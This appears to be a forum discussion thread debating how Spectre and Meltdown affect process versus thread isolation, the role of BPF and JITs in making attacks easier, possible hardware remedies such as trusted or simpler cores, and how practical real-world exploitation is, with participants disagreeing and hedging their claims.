So we'll need to have non-speculative execution for cloud CPUs and stronger efforts to keep untrusted code off our high performance CPUs. This may even lead to chips with performance cores and trusted cores.
This isn't a facetious question. A thread is just, at its core, a process that shares memory with another process. (In fact, this is how threads are implemented on Linux.) But all, or virtually all, processes also share memory with other processes. Text pages of DLLs are shared between processes. Browser processes have shared memory buffers, needed for graphics among other things.
What separates processes that share memory from threads that share memory regarding Spectre? Is it the TLB flush when switching between processes that doesn't occur between threads? Or something else?
For spectre v1 and v2, right now (on existing hardware) mostly nothing separates threads from processes. In the future, process isolation is a good candidate for designing hardware + system software such that different processes are isolated (via partitioning the caches, etc).
You probably still want threads within a process to share cache hits.
In terms of the possibility of exploit, as I understand there isn't at this point any isolation between processes.
In terms of the ease of exploit, being able to run untrusted code in the same process as the victim helps quite a bit. Otherwise, you have to find a gadget (i.e. qualifying bounds check for v1, indirect branch for v2) in the victim process that you can exploit from the attacker process. Possible, but quite a bit harder than making your own gadget.
This all ignores the forward looking reasons process isolation is a good idea. I can't keep track of the latest mitigations in Linux, but they pretty much all will only help between processes by flushing various hardware data structures. And hopefully someday we will have hardware actually designed to restore the guarantees of isolation between processes.
I'm pretty sure this is accurate, but I'm just a random guy on the internet so don't trust my word for it too much.
Since process boundaries are enforced by not mapping any ram not usable by the process, this means they don't get violated by spectre v1. If you have two threads which only share part of their address space, the unshared part is protected. Any executable or library mapped into multiple processes is readable from any of them.
^*: With modern cpus, multiple processes can be mapped in simultaneously using ASIDs, however this doesn't matter because they work as they should and properly isolate the processes. You can just assume the model "only one process is mapped at a time".
Are you sure that works? As I understand it, the issue with Spectre is the branch predictor, not the memory mappings. The reason why process isolation works is that branch prediction gets reset on context switch (or that this will happen on newer generations of hardware in the future).
The issue is that speculation allows bypassing software enforced bound checking, but, discounting meltdown, the hope is that hardware can still enforced them.
I thought this wasn't possible with ASLR'd relocations all over the place in the text?
It's worth noting that no existing or announced common hardware is "properly designed" according to this condition. Even the "fixed" Intel hardware that's been announced is still vulnerable to spectre v1 across process boundaries.
AMD Zen is.
Spectre v1 (bounds check bypass) only works inside processes. All it allows you to do is to read any memory location currently mapped into your address space, and so it gives anything that can execute code complete read access to the address space of the process it's running in. On Intel CPUs, this also allows reading the kernel address space, unless kpti is used. Eventually, the ability to read kernel memory will be removed, and so kpti becomes unneccessary.
On all AMD post-BD cpus, spectre v1 cannot be used to read kernel address space.
All the rest of spectre (and meltdown) can eventually be fixed, but it is effectively impossible to make a cpu that is both fast and doesn't exhibit spectre v1.
I don't think this is true. If it is, why did Linux add speculation barriers to bounds checks in the kernel?
I was in a discussion of this last week on another thread - see my previous comments for why I think spectre v1 has impact across processes.
I think you were having that discussion with me.
So, I went and read the whole lkml threads you linked and if I understood correctly, regarding spectre v1, the kernel is only expected vulnerable to bpf based attacks or similar. As far as I understand, the speculation barriers are used to protect arrays directly accessible by bpf programs.
There is a mention of out of process attacks to other userspace programs, but no details.
By carefully crafting inputs, I'm ready to admit that it might be theoretical ly possible to attack some exploitable branches, but the big deal with spectre is the high bandwidth that can be attained by directly running code in process.
Do you have any pointer to any description of an even remotely practical out of process spectre v1 attack that doesn't involve executing code in process? Repurposing an interface that is not meant to be used to run code (I e. Build your own VM) is fair game.
> If you read the papers you need a very specific construct in order to not
only cause a speculative load of an address you choose but also to then
manage to cause a second operation that in some way reveals bits of data
or allows you to ask questions.
> BPF allows you to construct those sequences relatively easily and it's
the one case where a user space application can fairly easily place code
it wants to execute in the kernel. Without BPF you have to find the right
construct in the kernel, prime all the right predictions and measure the
result without getting killed off. There are places you can do that but
they are not so easy and we don't (at this point) think there are that
> The same situation occurs in user space with interpreters and JITs,hence
is particularly vulnerable to versions of this specific attack because
the attacker gets to create the code pattern rather than have to find it.
> big deal with spectre is the high bandwidth that can be attained by directly running code in process
That depends on your perspective. If you are an OS developer who strives to guarantee process isolation, than it is a pretty big deal that spectre v1 allows you to read memory from the kernel or from other processes, even if it might be tricky to do so. If you write a JS JIT, then yeah you are probably most concerned about the single-process case.
> remotely practical
IMO, most spectre attacks are not remotely practical. No, I don't have a pointer. The only actual demonstrations of spectre I've seen is the one included with the original paper (single process).
But then, things moved on, standard ways to add more cache with multiple cores was lapped up and later on we found a design flaw that echoed back for a decade or more upon all these multi-core CPU's.
Though in fairness and to put some context upon all this, CPU design is more complex than writing TAX laws. Yet we have exploits for TAX laws appearing and used all the time by large corporations. Whilst the comparison is not ideal and some would say, unfair. It does highlight that nothing is perfect and what we may class as perfect today (or darn close), could and may very well be classed as swiss cheese in the future. It gets down to how far away that future is.
After all, we still have encryption utilised that we have (on paper) shown to be flawed to future quantum CPU's!
But in a World that was aware of Y2k decades before the event, the penchant of business to drive everything to the last minute for profit will always be a factor in advancements. After all, if CPU cores had isolated caches instead of sharing, then that would mitigate so many issues, yet it would cost more to make and most consumers would not appreciate the extra cost for what to them is little value in return above and beyond the cheaper solution. That's business for you and CPU's are made by them for profit.
That's why I said we need trusted cores - i.e. ones that don't implement speculative execution or share cache with other cores. Untrusted code needs to be run in physical isolation, not just virtual isolation.
Perhaps we just need to have a more restricted idea about what untrusted code is allowed to do.
Eg, if you do Haskell and just verify the function you are running is not in the IO monad, you might miss some usage of UnsafePerformIO. Even if you check their code, if you let them specify dependencies they might manages to sneak a buggy use of UnsafePerformIO into a library they submitted to hackage.
Plus, your restriction is essentially: no clock, no contact with the outside world, no threading, and a carefully considered interface to the host program to prevent time leaks.
For many usecases, this is not workable
Disallowing direct access to the outside world is a big restriction, but it may be that a lot of the things you'd want to do inside a sandboxed application that aren't safe could be delegated to trusted code through an appropriate interface.
Threading isn't necessarily a problem; the Haskell Par monad for instance should be fine as there is no program-visible way to know which of two sub-tasks executed in parallel finished first.
Presumably, this could be fixed easily by using the phantom type trick (same as ST) but it would make the type signatures ugly and possibly break existing code. (Maybe there's a more modern alternative to phantom types?) So, yeah, you might not want to use the Par monad as it's currently implemented in ghc as your secure parallel sandbox.
The online docs suggest using lvish if you want a safer Par monad interface, which I'm not familiar with (though the lvish docs say that it's not referentially transparent if you cheat and use Eq or Ord instances that lie).
The general idea seems sound, though -- it should be possible to have parallelism in a sandbox environment without allowing the sandboxed program to conditionally execute code based on which of several threads finished some task first.
umm, "on today's hardware"
Yes it would.
>> That would allow for a whole new class of bugs.
I think it's necessary, but not easy.
Actually what I think is necessary is for people to stop running code from random places - or even common places. Google could work without running stuff on my machine.
Pick two: performance, safety, convenience.
I've wondered if the solution is more, simpler cores. We concentrate on smaller, faster cores, and the programming to utilize them better. Perhaps advances in memory architectures as well. Hardware isn't my specialty, so I'm just brainstorming here.
Perhaps this is where ARM and even RISC-V based systems can step in.
But I'm a software guy, so what do I know? I just know I'd feel more comfortable with systems based on simpler CPUs that just cannot be exploited by the recent side-channel attacks discovered, rather than trying playing whack-a-mole with patches, along with trying to reason when it might be safe to use CPUs with these optimizations.
A few things: ARM and RISC-V definitely have specEx baked in (though you can not include SpecEx module on RISC-V). There are interesting alternatives to SpecEx. DSPs use delay slots, and I've seen delay slots used quite well in a GP-CPU. Getting high instruction saturation on a CPU with delay slots is a "hard compiler problem", but I have a few things to say about that:
Despite jokes about "better compilers", compilers are getting better (e.g. polyhedral optimization). One way to think of what OOOex/SpecEx is that it's figuratively the CPU JITting your code on the fly. The most popular programming language JITs aggresively anyways so one wonders if there isn't some reduplication going on.
Furthermore, the most popular programming language isn't entirely the most raw-power performant, and it's pretty clear that in our current ecosystem just pushing operations through the FPU (which is what x86 optimizes for) isn't necessarily the most important thing in the world; uptime, reliability, fault-tolerance, safe paralellization, distribution, and power conservation might be more important moving forward.
HM, oops, apparently RISC-V has OOOEx, not SpecEx.
RISC-V/ARM are specifications of instruction sets, for which there exists an enormous domain of possible implementations. Spectre/Meltdown are not inherent features of Instruction set architectures. They are emergent properties of certain implementations of those instruction set architectures.
For example, the BOOM implementation of RISC-V does out of order execution. The Rocket chip implementation does not. Both implement the RISC-V architecture.
I'm not replying to you specifically. But I see this sort of thing on HN all the time and I feel like it's an important distinction to make.
The compiler has to make static decisions. The hardware knows what is actually happening. There is an inherent information asymmetry at work that a "sufficiently smart" compiler seems unlikely to overcome.
My intuition says software can't beat the speed of a superscalar OOO CPU anymore than a GP CPU can beat a roughly equivalent DSP for algorithms suitable to run on the DSP, but I have no proof for that.
I'll also note that we've been promised "smarter compilers" for decades. Intel has tried that route several times. No one has ever made it work.
Pretty sure I mentioned JITting in my comment.
> My intuition says software can't beat the speed of a superscalar OOO CPU anymore
How good is good enough? I mean we have distributed tensor flow which is basically on the fly compilation that can reorganize your computational graph around nodes with gpus separated by network latency, or Julia where you can drop in a GPUarray as a datatype and move computation to the GPU without changing your code.
If we go to something a bit more baroque, java is within 1.5 of c/c++ these days
Could you hand roll a better solution? Probably. Would it be worth it? Doubtful.
On the contrary, the "many wimpy cores" approach has been very successful on GPUs (and other vector processors such as TPUs, etc.) What it hasn't been successful at is running existing software unmodified.
The best solution (the one we use today, in fact) seems to be a hybrid approach. We have a few powerful cores to run sequential code and many weaker units (often vector units; e.g. GPUs and SIMD) to run parallel code. Not all algorithms can be parallelized, so we'll likely always need a few fast sequential cores. But a lot of code can.
Trying to build large scale quantum computers could lead to styles of optimization that provably don't have side channel issues.
Also, many of these exploits require running native code to really even be possible, and a JIT offers a large degress of protection. Most of the machines I use, if you are already able to run native code, the battle has already been lost.
I think the security community can sometimes have Chicken Little syndrome. I most definitely wouldn't want performance enhancing techniques that might have side-channel vulnerabilities to not be produced or used because they might be exploitable in a use case (eg, web serving and rendering) that doesn't fit most others (eg, internal servers).
It's not easy, and many systems are more easily broken into by other means (e.g., unpatched known-vulnerable programs). But people are already demonstrating exploits; it's not theoretical.
Also, modern statistics is pretty amazing at removing noise. Don't make claims about "too much noise" until you've tried them.
> Most of the machines I use, if you are already able to run native code, the battle has already been lost.
Perhaps, but many others are in a different circumstance.
> I think the security community can sometimes have Chicken Little syndrome.
> I most definitely wouldn't want performance enhancing techniques that might have side-channel vulnerabilities to not be produced or used because they might be exploitable in a use case (eg, web serving and rendering) that doesn't fit most others (eg, internal servers).
Understandable, and that may be just fine for your situation. However, most systems try to use least privilege to reduce damage (e.g., if you break into one component, you don't get everything). This attack makes it easier to breach such isolation - so even in that case, you might have reason to be concerned.
The sky is not falling, at least not today. But there are reasons to be concerned.
1. This might be a vulnerability in theory but there's no POC
2. Well it's just a POC, no one has actually weaponized this.
3. Sure someone weaponized this but it is very difficult to pull off.
4. Oh the script-kiddie toolkits can build exploits for this automatically. Who could have seen it coming?!?
(Step #2 is probably where the various governmental spying agencies start deploying the exploit in targeted ways)
Perhaps this time things are different but it seems unlikely.
Everybody keep saying that the POC shows it is possible and that a real world exploit is easy after that. But Specter has been around for a year now, and nobody has yet to even get close to make a working exploit that didn't require some large leaps of faith.
And every time you bring this up, you get voted into the floor in HN. I get it. Specter is very cool, almost magical, but coolness doesn't make it any more likely to work.